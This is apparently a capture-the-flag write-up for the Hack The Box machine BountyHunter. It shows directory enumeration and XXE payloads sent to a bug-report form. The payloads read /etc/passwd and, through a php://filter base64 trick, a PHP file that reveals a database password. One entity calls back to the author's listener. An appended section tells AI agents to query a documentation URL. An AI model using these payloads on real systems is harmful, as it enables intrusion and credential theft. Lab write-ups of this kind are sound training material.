# 2 :80 xxe

```bash
$ gobuster dir -u 10.10.11.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -x php,html,txt
===============================================================
/assets               (Status: 301) [Size: 313] [--> http://10.10.11.100/assets/]
/resources            (Status: 301) [Size: 316] [--> http://10.10.11.100/resources/]
/portal.php           (Status: 200) [Size: 125]
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.100/css/]
/index.php            (Status: 200) [Size: 25169]
/db.php               (Status: 200) [Size: 0]
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.100/js/]


http://10.10.11.100/resources/README.txt
Tasks:
[ ] Disable 'test' account on portal and switch to hashed password. Disable nopass.
[X] Write tracker submit script
[ ] Connect tracker submit script to the database
[X] Fix developer group permissions

http://10.10.11.100/portal.php
Portal under development. Go <a href="log_submit.php">here</a> to test the bounty tracker.

http://10.10.11.100/log_submit.php
Bounty Report System - Beta
# contains form to report bugs

# understanding how the data is sent as Burp sees encoded data being sent
data entered on form > base64 > url_encode > sent.

Using CyberChef we know recipe, using Burp we can try XXE attacks

https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity

# adding this to our sent data
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://10.10.16.161"> %xxe; ]>

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.100 - - [01/Aug/2021 22:11:38] "GET / HTTP/1.0" 200 -

# we see request coming back, time to XXE
# Using https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity#read-file

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>
<bugreport>
   <title>k</title>
   <cwe>k</cwe>
   <cvss></cvss>
   <reward>&xxe;</reward>
</bugreport>

# /etc/passwd
root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash


# tried using RCE with expect://id
# did NOT WORK; tried a lot

# moving back to reading files, we can now read db.php
# does not work.
# php files are not readable, need to get it encoded in some form

Using the second case: https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity#read-file

# <!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
# <data>&example;</data>

# code
<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php"> ]>
<bugreport>
   <title>k</title>
   <cwe>k</cwe>
   <cvss></cvss>
   <reward>&xxe;</reward>
</bugreport>

# encoded value
PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgeHhlIFNZU1RFTSAicGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT0vdmFyL3d3dy9odG1sL2RiLnBocCI%2BIF0%2BCjxidWdyZXBvcnQ%2BCiAgIDx0aXRsZT5rPC90aXRsZT4KICAgPGN3ZT5rPC9jd2U%2BCiAgIDxjdnNzPjwvY3Zzcz4KICAgPHJld2FyZD4meHhlOzwvcmV3YXJkPgo8L2J1Z3JlcG9ydD4%3D

# send via burp
Title: 	k
CWE: 	k
Score: 	
Reward: 	PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=

# base64 decoded
<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kashz.gitbook.io/hackthebox-writeups/htb-boxes/bountyhunter/2-80-xxe.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.